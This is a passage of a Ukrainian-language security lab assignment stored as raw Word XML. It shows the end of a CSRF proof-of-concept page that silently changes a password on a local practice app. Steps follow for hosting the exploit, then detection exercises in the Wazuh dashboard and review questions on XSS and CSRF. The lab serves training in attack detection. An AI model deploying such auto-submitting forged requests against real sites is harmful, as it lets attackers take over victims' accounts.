        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/vulnerabilities/csrf/" method="GET"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7AB4B0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  &lt;input type="hidden" name="password_new" value="csrf_pwned"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7285F3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  &lt;input type="hidden" name="password_conf" value="csrf_pwned"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689AD19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  &lt;input type="hidden" name="Change" value="Change"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC24843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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B0450" w14:textId="77777777" w:rsidR="005245BC" w:rsidRPr="00C63D08" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;script&gt;document.getElementById('csrf').submit()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C13FF7" w14:textId="77777777" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1948F" w14:textId="3D21B938" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F4905" w14:textId="60A06B95" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="00405B9F" w:rsidP="00405B9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-142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Повторно запустіть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>веб-сервер для хостингу експлойту</w:t>
      </w:r>
      <w:r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5245BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ідкрийте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новостворений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5BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у браузері та спостерігайте автоматичну зміну пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5D44E" w14:textId="597A6B1B" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC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5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2B648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5245B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Виявлення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5245BC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 w:rsidRPr="005245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F7435F" w14:textId="77777777" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245B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Відкрийте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh Dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8D98D" w14:textId="77777777" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245B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до вкладки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00FC76" w14:textId="48670134" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245B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Знайдіть події з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524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B9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05B9F"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70B24F" w14:textId="487FA1A2" w:rsidR="002B648E" w:rsidRDefault="005245BC" w:rsidP="002B648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Проаналізуйте деталі алертів та підтвердіть правильність виявлення.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E340B" w14:textId="17E2EB7C" w:rsidR="00F56CE4" w:rsidRPr="002B648E" w:rsidRDefault="00405B9F" w:rsidP="002B64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5B9F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="656E7C62" wp14:editId="08F80766">
            <wp:extent cx="5353050" cy="3142592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6237" cy="315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0D56" w14:textId="6368954C" w:rsidR="00405B9F" w:rsidRDefault="00405B9F" w:rsidP="00405B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 – Приклад алертів, що свідчать про атаки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</w:p>
    <w:p w14:paraId="3079B7B8" w14:textId="10A13187" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B648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48E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для кожного типу атаки (</w:t>
      </w:r>
      <w:r w:rsidRPr="002B648E"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виберіть по одному алерту. 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Проаналізуйте та опишіть наступні поля:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F5D526" w14:textId="4C0D69D9" w:rsid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Ідентифікатор правила, яке спрацювало (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
      <w:r w:rsidRPr="002B64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9A27F07" w14:textId="2240351F" w:rsidR="002B648E" w:rsidRP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 правила, що пояснює тип виявленої атаки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rule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42A667" w14:textId="08E77011" w:rsid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критичності алерту (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
      <w:r w:rsidRPr="002B64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level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1C2F4AC" w14:textId="106E7D69" w:rsid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Категорія атаки (наприклад,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2B64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 w:rsidRPr="002B64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64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attack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9CDD146" w14:textId="38C61287" w:rsid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Техніка з бази </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE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ATT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C1A04F" w14:textId="287AF356" w:rsid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IP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>адреса джерела атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5E8F6" w14:textId="5E52321B" w:rsid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запиту, який містить шкідливий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6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592348" w14:textId="38C05CF6" w:rsid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Файл логів, з якого була отримана подія (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location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6BB1053" w14:textId="34C4A16B" w:rsidR="002B648E" w:rsidRPr="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B648E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Повний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лог, що містить запис веб-запиту, який спричинив спрацювання правила (</w:t>
      </w:r>
      <w:r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2B648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log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F49B0C1" w14:textId="6CBFEDC1" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B64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110937" w14:textId="1A9B3F73" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="002B64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DDE8A8" w14:textId="6C33529D" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="002B64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F54C39" w14:textId="6879CB7F" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="002B64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80A819" w14:textId="19BD7C35" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="002B64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52CEC7" w14:textId="24D373BF" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="002B64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C32F56" w14:textId="319D7857" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674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96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запитання</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E62CC" w14:textId="0391102F" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2683FC" w14:textId="3C3D8388" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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тип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збереження шкідливого коду на сервері?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBD0AD" w14:textId="4ECD320F" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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основна особливість </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reflected</w:t>
      </w:r>
      <w:r w:rsidRPr="00674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674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F97E1" w14:textId="319DC5FB" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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основна особливість </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="006749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674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 w:rsidRPr="00674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31064CA8" w14:textId="7D41F3F9" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66399C87" w14:textId="69646BB8" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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механізм найчастіше використовується для захисту від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 w:rsidRPr="00674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8559B2" w14:textId="569AD433" w:rsidR="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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  <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-елемент найчастіше</w:t>
      </w:r>
      <w:r w:rsidRPr="00674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для реалізації </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF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-атаки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6749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запит?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7EE4D" w14:textId="1909A318" w:rsidR="00674968" w:rsidRPr="00674968" w:rsidRDefault="00674968" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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техніка з бази </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="006749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ATT</w:t>
      </w:r>
      <w:r w:rsidRPr="00674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CK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атакам через веб-додатки (наприклад, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS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7496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sectPr w:rsidR="00674968" w:rsidRPr="0067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64B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5122FE5A"/>
    <w:lvl w:ilvl="0" w:tplc="CF6CE9E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CE68D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8663D46"/>
    <w:lvl w:ilvl="0" w:tplc="7FC895D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D913AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96F0F1CE"/>
    <w:lvl w:ilvl="0" w:tplc="94DAE89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F94F51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33ACDD76"/>
    <w:lvl w:ilvl="0" w:tplc="4780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E609D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72D6FF6C"/>
    <w:lvl w:ilvl="0" w:tplc="80E409D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08560A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEAC9328"/>
    <w:lvl w:ilvl="0" w:tplc="110E8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DA505EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BE6AE82"/>
    <w:lvl w:ilvl="0" w:tplc="736088D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73B40D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A84C792"/>
    <w:lvl w:ilvl="0" w:tplc="C2781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C8519A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F57EAE6E"/>
    <w:lvl w:ilvl="0" w:tplc="402897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3C2F3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3C2C1BA"/>
    <w:lvl w:ilvl="0" w:tplc="EDEC33E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11B668E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8440EF08"/>
    <w:lvl w:ilvl="0" w:tplc="211A535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31C578B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC3A2BD0"/>
    <w:lvl w:ilvl="0" w:tplc="2738D76C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space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D2B2F71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CE4D980"/>
    <w:lvl w:ilvl="0" w:tplc="3394470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D480D79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="598EF3C6"/>
    <w:lvl w:ilvl="0" w:tplc="AA66A18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294B51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D98EAA86"/>
    <w:lvl w:ilvl="0" w:tplc="EBC81D5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5AD1D5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E24FDA"/>
    <w:lvl w:ilvl="0" w:tplc="4780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93218BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB228CE0"/>
    <w:lvl w:ilvl="0" w:tplc="B0BCD3B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E0667BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF085506"/>
    <w:lvl w:ilvl="0" w:tplc="FDECDCE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C217837"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="929E25A4"/>
    <w:lvl w:ilvl="0" w:tplc="17A4432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10D5815"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D25E108E"/>
    <w:lvl w:ilvl="0" w:tplc="4780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4606188"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D25E108E"/>
    <w:lvl w:ilvl="0" w:tplc="4780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70E2994"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6BE25B0"/>
    <w:lvl w:ilvl="0" w:tplc="4780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BA71449"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA7EA97A"/>
    <w:lvl w:ilvl="0" w:tplc="A620B944">
      <w:start w:val="6"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space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11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2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7"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="6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EB"/>
    <w:rsid w:val="002B648E"/>
    <w:rsid w:val="002D3E8D"/>
    <w:rsid w:val="00393452"/>
    <w:rsid w:val="003B270F"/>
    <w:rsid w:val="00405B9F"/>
    <w:rsid w:val="005245BC"/>
    <w:rsid w:val="00674968"/>
    <w:rsid w:val="007107FE"/>
    <w:rsid w:val="00AA1AEB"/>
    <w:rsid w:val="00B83C48"/>
    <w:rsid w:val="00C07AE3"/>
    <w:rsid w:val="00C63D08"/>
    <w:rsid w:val="00E237E1"/>
    <w:rsid w:val="00E53719"/>
    <w:rsid w:val="00F56CE4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D1D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3315D447-CA1A-478F-B931-A4A51C1E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719"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E53719"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i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Laichuk</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Artem Laichuk</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-16T09:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-16T09:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>